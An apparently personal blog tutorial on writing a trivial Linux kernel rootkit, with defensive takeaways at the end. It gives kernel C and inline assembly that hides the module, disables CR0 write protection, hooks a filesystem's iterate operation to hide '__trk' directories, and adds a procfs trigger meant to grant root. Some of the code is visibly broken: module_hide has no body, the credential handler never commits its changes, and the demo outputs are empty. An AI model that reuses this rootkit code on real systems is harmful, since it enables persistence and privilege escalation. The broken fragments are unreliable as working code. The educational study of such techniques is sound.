Anatomy of a simple Linux rootkit

I'm not a security guy, and most of the programs I write run on things with kilobytes of memory, but I've always had a bit of an interest in the problem of computer security. Some of it is indirect: I have to write secure code, so I have to learn how to write secure code -- and an important part of that is learning how to spot insecure code that I wrote. Some of it is direct, though. One of the best ways to learn the innards of an operating system is to try to tamper with its "normal" operation. When you manage to do it, it's typically a sign that you have understood the part of the system that you're tampering with.

So a few days ago I set out to write a very trivial (i.e. useless) rootkit for Linux, and chronicled things all along.

The last time I wrote any code for the Linux kernel, 2.6.32 was still new, so I figured this would be a great way to remember a few things. Besides, a rootkit is probably the most trivial form of malware that one can write. A rootkit is inserted at a point when the attacker has already compromised the machine, has root access, and wants to keep it. It doesn't have to be too subtle, because it can do virtually anything to hide itself. It doesn't have to go around too many protection mechanisms, either: the user is root and can insmod things. You get to poke around the kernel. If a protection mechanism is in the way, you can just disable it.

Note that the point here was not to write a viable rootkit. This is easy to detect. I'm just scratching the surface, but there are a few interesting lessons to be learned even from something as small as this.

What we'll do

We'll write a kernel module that:

  1. Hides itself from the list of modules.
  2. Hides certain directories, so that we can fill them with good and useful stuff
  3. Spawns a root shell when something in particular happens.

I decided early on that I'd be fine with it remaining architecture-dependent. In principle, something as trivial as what I'll be describing here can be made completely portable, but I didn't want to miss out on some interesting points, and those do mean this will only work on x86_64.

When writing a real exploit, we also generally want to hide one (or more) PIDs from the list of processes. This is a lesson for some other time, perhaps. It's fairly easy to achieve as well, but I can make all the points I want to make without this feature.

Hiding our kernel module

Let's start at the beginning: it's quite pointless to write a tool that hides files if that tool is itself easy to find. At the very least, it shouldn't show up in lsmod's list.

It's straightforward to see how lsmod gets a list of all kernel modules (here's how Busybox's modutils does it, for instance) but not too informative. We could conceivably trap reads from /proc and not show our own entry, but that's far too complex. In fact, it's a lot more straightforward to just remove our entry.

What entry? Here's how the kernel sees our module (include/linux/module.h):

    struct module {
        enum module_state state;
        /* Member of list of modules */
        struct list_head list;
        /* Unique handle for this module */
        char name[MODULE_NAME_LEN];
        /* Sysfs stuff. */
        struct module_kobject mkobj;
        /* ... many more members ... */
    };

Ha! A cursory glance at load_module in kernel/module.c shows that, indeed, our module is added to the list of modules upon loading. So we should take it out of there. The sysfs entry (the one under /sys/module) is, unsurprisingly, hidden in mkobj, so we should remove that from the list of kobjects as well.

Easy as pie:

    static void module_hide(void)

Just for fun, let's confirm that it works:

    # lsmod | grep trk
    # dmesg
    [6155.845814] Hiding...

Ha. Nice. Looks good.
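
If the "just remove our entry" idea feels too easy, here is a minimal userspace sketch of what unlinking from a circular doubly-linked list does. Everything in it is a stand-in I made up for illustration: list_node mimics the kernel's struct list_head, and record is a toy with a name field. It is not kernel code. The point is only that a walker which follows the links can no longer reach an unlinked node, even though the node itself is still sitting in memory.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Userspace stand-in for the kernel's struct list_head (hypothetical copy). */
struct list_node {
    struct list_node *next, *prev;
};

/* Toy record with the list node as its first member (assumption). */
struct record {
    struct list_node list;
    char name[16];
};

/* An empty circular list points at itself in both directions. */
static void list_init(struct list_node *head)
{
    head->next = head;
    head->prev = head;
}

/* Insert node right after head. */
static void list_add_node(struct list_node *node, struct list_node *head)
{
    node->next = head->next;
    node->prev = head;
    head->next->prev = node;
    head->next = node;
}

/* Unlink node: its neighbours now point past it; the node stays allocated. */
static void list_del_node(struct list_node *node)
{
    assert(node != NULL && node->next != NULL && node->prev != NULL);
    node->prev->next = node->next;
    node->next->prev = node->prev;
    node->next = node;
    node->prev = node;
}

/* Walk the list the way a lister would; return 1 if name is found. */
static int list_contains(const struct list_node *head, const char *name)
{
    const struct list_node *pos;

    for (pos = head->next; pos != head; pos = pos->next) {
        /* list is the first member, so the node address is the record address */
        const struct record *r = (const struct record *)pos;

        if (strcmp(r->name, name) == 0)
            return 1;
    }
    return 0;
}
```

Add two records, unlink one, and list_contains() stops reporting it while the record's name is still readable through a direct pointer. Anything that enumerates by walking the list is blind to it. Anything that holds its own reference is not.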

Hiding directories

Next up: let's hide files. Generally, you want to do this in places that are not accessed too often and not too closely monitored for some reason.

There are a lot of ways to do that, and probably the most straightforward is to replace the getdents() system call with our own version. I'm going to try something a little different, though probably just as widely used: I'll replace the iterate file operation, which getdents() uses to obtain the directory listing, with one that will only include some of the entries in the directory.

Intercepting file operations

A struct file always contains a pointer to the table of file operations used to manipulate it. This means we can get it as follows:

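    struct file *boot_filp;
    struct file_operations *fs_ops;

    /* filp_open() reports failure with an ERR_PTR() value, not NULL */
    boot_filp = filp_open("/boot", O_RDONLY, 0);
    if (IS_ERR(boot_filp))
        return PTR_ERR(boot_filp);

    /* f_op is a const pointer; cast the const away so we can write later */
    fs_ops = (struct file_operations *)(boot_filp->f_op);

    filp_close(boot_filp, NULL);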

Right: now we have a copy of boot_filp's f_op pointer. At the other end of that pointer lies a table of operations populated by the filesystem driver: open, release, write and a bunch of others -- including the one we're interested in, iterate. We opened /boot, but the operations table is in the filesystem driver, so we actually got access to the driver of whatever filesystem /boot happens to be. In most cases, /boot will be the same filesystem type as every other partition on the hard drive, but not necessarily -- which means that (depending on the setup), we may not be able to hide directories outside /boot.

Ok, so we only have to replace that and we're done. Easy as pie, it seems. But it's not that straightforward. For obvious reasons, the table of file operations resides in rodata: it's read-only.

Now, at least on x86_64 (but not only -- this tends to be true for most von Neumann and modified Harvard architectures), "read only" is... more or less a convention if you're in supervisor mode. rodata's pages are marked read-only, but we can obviously mark them as read-write if we wish (we're the supervisor after all, aren't we?). However, doing so is not very comfortable; there aren't many reasons why something outside the memory management module would want to mess with page attributes, so the API being exposed is pretty barren (and not too stable; it doesn't look at all like what I remembered from 2.6).
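
To make the "read-only is a page attribute, not a law of nature" point concrete without touching the kernel, here is a userspace analogy. It's a sketch that assumes Linux or a similar POSIX system, and write_after_unprotect is a name I made up. A process maps a page, marks it read-only, then asks for write access back and stores to it. The mmap, mprotect and munmap calls are the standard POSIX ones.

```c
#define _DEFAULT_SOURCE   /* for MAP_ANONYMOUS on glibc */
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Map one page, make it read-only, then flip it back to read-write and
 * store a byte. Returns the byte read back, or -1 on any failure.
 */
static int write_after_unprotect(unsigned char value)
{
    long page = sysconf(_SC_PAGESIZE);
    unsigned char *p;
    int result = -1;

    if (page <= 0)
        return -1;

    p = mmap(NULL, (size_t)page, PROT_READ | PROT_WRITE,
             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;

    /* While the page is PROT_READ, a store to *p would raise SIGSEGV. */
    if (mprotect(p, (size_t)page, PROT_READ) == 0 &&
        /* Whoever owns the mapping can simply ask for write access back. */
        mprotect(p, (size_t)page, PROT_READ | PROT_WRITE) == 0) {
        p[0] = value;
        assert(p[0] == value);
        result = p[0];
    }

    munmap(p, (size_t)page);
    return result;
}
```

The protection stops stray stores, not the party that controls the page attributes. In the kernel the same flip is possible in principle, just through much less convenient interfaces.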

However, x86_64 "helpfully" allows us to just bring an elephant into the porcelain shop, let him smash everything he wants, then flip a switch to piece everything back together once he's out. Here's what the documentation says about the WP flag in CR0:

WP Write Protect (bit 16 of CR0) - When set, inhibits supervisor-level procedures from writing into read-only pages; when clear, allows supervisor-level procedures to write into read-only pages (regardless of the U/S bit setting; see Section 4.1.3 and Section 4.6). This flag facilitates implementation of the copy-on-write method of creating a new process (forking) used by operating systems such as UNIX.

We can globally disable write protection. We'll just have to make sure we don't get preempted while we're doing anything with the write protection globally disabled. If we get preempted by something that assumes data in write-protected pages really is write-protected, chaos (or detection...) might ensue.

Ok, let's see what we can come up with.

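    static void disable_wprotect(void)
    {
        /* Interrupts off first, then clear CR0.WP (bit 16). */
        asm volatile("cli;"
                     "movq %cr0, %rax;"
                     "andq $0xFFFFFFFFFFFEFFFF, %rax;"
                     "movq %rax, %cr0;");
    }

    static void enable_wprotect(void)
    {
        /* Set CR0.WP again, then turn interrupts back on. */
        asm volatile("movq %cr0, %rax;"
                     "orq $0x10000, %rax;"
                     "movq %rax, %cr0;"
                     "sti;");
    }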

Man, I'd almost forgotten how much I hate AT&T syntax.

The basic idea should be obvious: move CR0 to RAX, clear bit 16, move the result back to CR0 to disable write protection, and do the exact opposite to enable it again. cli (CLear Interrupt flag) disables interrupts, which prevents scheduling as a side-effect (no timer interrupts -- no scheduler to make us pack our bags, no ISRs to run while our code is running). sti does the exact opposite.
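
The two magic constants in the assembly are just a one-bit mask and its complement. Here is a small sketch of that arithmetic in plain C, working on an ordinary 64-bit integer rather than the real register. The macro and function names are mine, not anything from the kernel.

```c
#include <assert.h>
#include <stdint.h>

/* WP is bit 16 of CR0, counting from bit 0. */
#define CR0_WP_BIT  16
#define CR0_WP_MASK (UINT64_C(1) << CR0_WP_BIT)

/* Non-zero if the WP bit is set in the given value. */
static int cr0_wp_is_set(uint64_t cr0)
{
    return (cr0 & CR0_WP_MASK) != 0;
}

/* Same effect as the andq with 0xFFFFFFFFFFFEFFFF: clear bit 16 only. */
static uint64_t cr0_clear_wp(uint64_t cr0)
{
    uint64_t out = cr0 & ~CR0_WP_MASK;

    assert(!cr0_wp_is_set(out));
    return out;
}

/* Same effect as the orq with 0x10000: set bit 16 only. */
static uint64_t cr0_set_wp(uint64_t cr0)
{
    return cr0 | CR0_WP_MASK;
}
```

CR0_WP_MASK is 0x10000 and its complement is 0xFFFFFFFFFFFEFFFF, which is where the immediates come from. Clearing and then setting the bit returns a value to where it started, provided WP was set to begin with.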

Now we can do our malicious replacement. We'll save a pointer to the "good" iterate operation (we still need it in order to get directory entries), but we'll replace its entry in the file operations table with our own function.

    intercepted_iterate = fs_ops->iterate;
    fs_ops->iterate = trk_iterate;

For the moment, trk_iterate does only this:

    static int trk_iterate(struct file *fd, struct dir_context *ctx)
    {
        printk(KERN_DEBUG "Intercepted iterate op.\n");
        return intercepted_iterate(fd, ctx);
    }

Let's see if this works.

    # insmod trk.ko 
    # ls
    # dmesg
    [ 6006.380270] Intercepted iterate op.

Looks good.

To help you with debugging, it is useful if you do the opposite in the module's exit function -- otherwise our malicious intercept is going to remain in the file operations table of that filesystem's driver after rmmod, and will eventually cause things to go awry.
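
The save, replace and restore dance is easier to see with the kernel stripped away. Below is a userspace sketch with a made-up one-entry operations table (struct ops, driver_ops and the hook_* functions are all hypothetical names). It shows the same three steps: remember the original pointer, point the table at a wrapper that calls the original, and put the original back on the way out.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, much-reduced analogue of struct file_operations. */
struct ops {
    int (*iterate)(int arg);
};

/* The "real" operation provided by our pretend driver. */
static int real_iterate(int arg)
{
    return arg + 1;
}

/* One table shared by every "file" of this pretend driver. */
static struct ops driver_ops = { .iterate = real_iterate };

static int (*saved_iterate)(int arg);  /* original entry, while hooked */
static int hook_calls;                 /* how often the wrapper ran */

/* Wrapper: note the call, then defer to the original. */
static int hooked_iterate(int arg)
{
    hook_calls++;
    return saved_iterate(arg);
}

/* Save the original entry and put the wrapper in its place. */
static void hook_install(struct ops *ops)
{
    assert(saved_iterate == NULL);
    saved_iterate = ops->iterate;
    ops->iterate = hooked_iterate;
}

/* Undo hook_install(), as a module's exit function would have to. */
static void hook_remove(struct ops *ops)
{
    assert(saved_iterate != NULL);
    ops->iterate = saved_iterate;
    saved_iterate = NULL;
}
```

Callers of driver_ops.iterate see the same results before, during and after the hook. Only hook_calls shows that anything was ever in the way. If hook_remove() is skipped, the table keeps pointing at the wrapper, and in the kernel case that wrapper's code is gone after rmmod.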

Tampering with the results

Ok, we've intercepted iterate, now what?

As it turns out, iterate is actually used in combination with a callback -- filldir. The whole story can be found in fs/readdir.c, but long story short is that iterate is going to call the actor callback in the directory context passed to it for every directory entry. actor is going to fill in all the data that will be sent to userspace.

That member is set to filldir, and that's a problem, because the declaration of dir_context looks like this:

    struct dir_context {
        const filldir_t actor;
        loff_t pos;
    };

So we can't just say ctx->actor = bad_actor.

Of course, const doesn't really mean "this is read-only", it just says "you can't assign to this member". No one said anything about overwriting it. Our plan here is as follows: in our malicious iterate, we're going to keep a pointer to the "good" filldir, then replace the pointer to the good filldir in the context with a pointer to our own. We then call the original ("good") iterate function with our bad context and restore the good filldir in the dir_context so that we don't look suspicious (and so that any further code that works on that directory context after calling iterate doesn't break).
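
Here is the const trick on its own, as a userspace sketch with hypothetical types (struct context standing in for dir_context, actor_t for filldir_t). One assumption to flag loudly: the struct lives in malloc'd memory. The C standard makes writing to an object that was defined const undefined behaviour, so this shows what compilers let you get away with in practice, not something the language promises.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

typedef int (*actor_t)(int);

/* Hypothetical analogue of struct dir_context: one const callback member. */
struct context {
    const actor_t actor;
    long pos;
};

static int good_actor(int x)  { return x; }
static int other_actor(int x) { return -x; }

/* Allocate a context on the heap; the const member is filled via memcpy. */
static struct context *context_new(actor_t actor)
{
    struct context init = { .actor = actor, .pos = 0 };
    struct context *ctx = malloc(sizeof *ctx);

    if (ctx != NULL)
        memcpy(ctx, &init, sizeof init);
    return ctx;
}

/* "ctx->actor = actor;" would not compile, so copy the bytes over instead. */
static void context_set_actor(struct context *ctx, actor_t actor)
{
    assert(ctx != NULL);
    memcpy((void *)&ctx->actor, &actor, sizeof actor);
}
```

After context_set_actor(ctx, other_actor), a call through ctx->actor lands in other_actor. The compiler only refused the assignment syntax. It never guarded the bytes.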

So our malicious iterate function, along with the bad filldir that it calls, would look like this:

    static filldir_t good_filldir;

    static int bad_filldir(struct dir_context *ctx, const char *name,
                           int namlen, loff_t offset, u64 ino,
                           unsigned int d_type)
    {
        printk(KERN_DEBUG "Bad filldir!\n");

        /* Pretend the entry was handled, but never pass it on */
        if (!strncmp("__trk", name, 5))
            return 0;

        return good_filldir(ctx, name, namlen, offset, ino, d_type);
    }

    static int trk_iterate(struct file *fd, struct dir_context *ctx)
    {
        int err;
        filldir_t p = bad_filldir;
        good_filldir = ctx->actor;

        /* Pollute ctx with the bad filldir */
        memcpy((void *)(&(ctx->actor)), (void *)&p, sizeof p);

        err = intercepted_iterate(fd, ctx);

        /* Restore old actor so that we don't look suspicious */
        p = good_filldir;
        memcpy((void *)(&(ctx->actor)), (void *)&p, sizeof p);

        return err;
    }
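
The filtering logic itself has nothing kernel-specific about it. It's a callback that sits in front of another callback. As a sketch, here is the same shape in userspace, with an array of names instead of a directory and a string buffer instead of the getdents() result. All the names here (emit_t, list_dir, filtering_emit and so on) are invented for the illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Callback type: receives one entry name at a time (hypothetical). */
typedef int (*emit_t)(void *sink, const char *name);

/* Collects emitted names, each followed by a space. */
struct listing {
    char buf[128];
};

/* The "good" callback: append the name to the listing. */
static int emit_name(void *sink, const char *name)
{
    struct listing *l = sink;

    if (strlen(l->buf) + strlen(name) + 2 > sizeof l->buf)
        return -1;  /* would not fit */
    strcat(l->buf, name);
    strcat(l->buf, " ");
    return 0;
}

#define HIDDEN_PREFIX "__trk"

static emit_t next_emit;  /* the callback we are standing in front of */

/* The filter: swallow matching names, forward everything else. */
static int filtering_emit(void *sink, const char *name)
{
    assert(next_emit != NULL);
    if (strncmp(name, HIDDEN_PREFIX, strlen(HIDDEN_PREFIX)) == 0)
        return 0;  /* report success, emit nothing */
    return next_emit(sink, name);
}

/* Stand-in for iterate: call emit once per entry, stop on error. */
static int list_dir(const char *const *names, size_t n,
                    emit_t emit, void *sink)
{
    size_t i;

    for (i = 0; i < n; i++) {
        int err = emit(sink, names[i]);

        if (err)
            return err;
    }
    return 0;
}
```

With the names "vmlinuz", "__trk_stash" and "grub", list_dir() with emit_name lists all three. With next_emit set to emit_name and filtering_emit passed in instead, it lists only "vmlinuz" and "grub". The function doing the walking is the same in both cases and reports success in both.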

Spawning a root shell

There's a long explanation on credentials here and there is no point in covering it myself. I'll just give you the gist of it: each "thing" in the Linux kernel that can be acted upon by userspace programs (i.e. each object, in kernelspeak) has an associated set of credentials. These credentials include -- but are not limited to -- the traditional Unix UID, GID, EUID and EGID (there are also things like capabilities and securebits which open a lot of interesting possibilities but I won't cover here).

There are a lot of ways to trigger the spawning of a root shell, but I want to keep things easy for this example: we'll just create a procfs entry, and writing to it will be the trigger: the write function will alter the credentials of the current (i.e. writing) task, setting the UID and GID to 0. This is simple because, in Linux, a task can only (trivially) alter its own credentials; a write() call is a good place to do it, because we can do that with echo, and echo is usually a shell built-in, which means that the write() will be triggered by the shell itself (and will thus lead to the altering of the spawning shell's own credentials).

Like this:

    static ssize_t pfs_op_write(struct file *file, const char __user *buffer,
                                size_t count, loff_t *ppos)
    {
        struct cred *credentials;
        credentials = prepare_creds();
        credentials->uid.val = 0;
        credentials->euid.val = 0;
        credentials->gid.val = 0;
        credentials->egid.val = 0;
        return count;
    }

The implementation of the procfs-related functions is left as an exercise to the reader (or, if you're lazy, you can see it here). Let's see if it works:

    $ whoami
    $ echo 2 > /proc/ksym
    $ whoami


What we learned

If it's compromised, wipe it

Let's start with a light one.

If I remember it correctly from the days when I was aspiring to be a sysadmin, it was recommended that, if a machine was compromised to the point that a user obtained root access, it should be disconnected from the network and wiped out. This is why.

Root can tamper with the kernel. If he does it right, all your fancy protection schemes mean nothing, because they can be overruled. Worse yet, they can be silently overruled.

Const means nothing

const is only a semantic convention. It's basically the compiler saying "I shall not allow assignments to this identifier once it's initialized". The compiler will generally keep its promise, but nothing else in the system knows about it, let alone cares about it.

On some architectures, neither does read-only, and we should think about that a little

On x86_64, page write protection is more or less meaningless. It helps protect against accidental writes to a page that should be read-only, but certainly not against intentional writes.

At this point, one might argue that if the kernel is malevolent, it doesn't matter. Which is a more valid point than it sounds. At the end of the day, if someone can insert malicious code into the kernel, it really doesn't matter whether write protection can be disabled on your architecture. I mean, if they really want a root account on your system, there are plenty of less subtle things to do, like replacing the whole bloody TTY driver to intercept passwords, or patching sshd to leak keys, or whatever. Above, we could have achieved the same result without bypassing the write protection; bypassing write protection is just trivial enough for me to be able to write a page about it, but it's certainly not the only possibility.

There is one place where this should still be a reason to panic though: what if we're running in a hypervisor?

Virtualization is a complex thing. More so when it's patched onto an 8-bit CPU on steroids. And bad stuff has been known to happen. There are few things programmers suck more at than managing complexity, and with the rampant complexity of virtualization solutions, they're bound to be riddled with bugs. A compromised hypervisor means a bunch of compromised guests -- with users who have no idea, because they are otherwise running systems that, as far as they can tell, have not been tampered with at all.

But let's imagine that there is life beyond the "dude, someone has root access to your server" disaster and pretend that there are still some relevant things we can do after that.

A first interesting point is that a trivial way of preventing this technique from being used is not loading any modules in the first place. In general, allowing a (possibly malicious) user to add code to the kernel is a vulnerability; arguably, insmod matches the definition. If someone wanted to load their own code into a kernel without loadable module support, their options would be a lot more limited.

A second interesting point: twice, the main entry points in our exploit above have been in the filesystem driver. What if everything except for I/O drivers and the scheduler were to run in userspace? This would make exploitation a lot more difficult. Of course, when someone already has root access on a system, he has a lot of options for maintaining that root access. However, when you're sharing process descriptor tables with every device driver on your system, you are kind of asking for it.

Oh yeah, about binary blobs

Let me write that again.

However, when you're sharing process descriptor tables with every device driver on your system, you are kind of asking for it.

Next time you install a binary-only driver for your network card, think about that.